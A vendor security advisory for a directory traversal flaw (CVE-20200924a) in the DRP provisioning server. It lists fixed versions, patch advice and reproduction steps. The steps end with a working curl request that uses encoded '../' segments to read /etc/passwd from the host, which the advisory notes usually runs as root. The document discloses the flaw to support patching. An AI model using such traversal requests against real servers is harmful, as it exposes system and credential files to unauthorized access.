Security (Web requests can navigate outside DRP controlled areas (CVE-20200924a))
DRP server incorrectly respects using
.. for navigation if resulting path is outside managed areas. This potentially
allowed bad actors to access the host file system.
- Classification: Directory Traversal
- Reported: Sept 24, 2020
- Fixed: Sept 24, 2020
- Addressed In: v4.5, v4.4.7, v4.3.8, v4.2.17
Users are advised to apply this patch as soon as possible. Patching involves replacing the DR-SERVER binary that closes matches the currently deployed version.
Code was added to prevent out of bounds navigation.
Steps to reproduce¶
docker run --rm -it ubuntu /bin/bash apt update && apt install -y curl cd /opt mkdir drp ; cd drp curl -fsSL get.rebar.digital/stable | bash -s -- --isolated install ./dr-provision --base-root=`pwd`/drp-data --local-content="" --default-content="" > drp.log 2>&1 & curl -k https://127.0.0.1:8092/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
The above results on the contents of /etc/passwd being shown. This is particularly bad given that this application generally runs as root.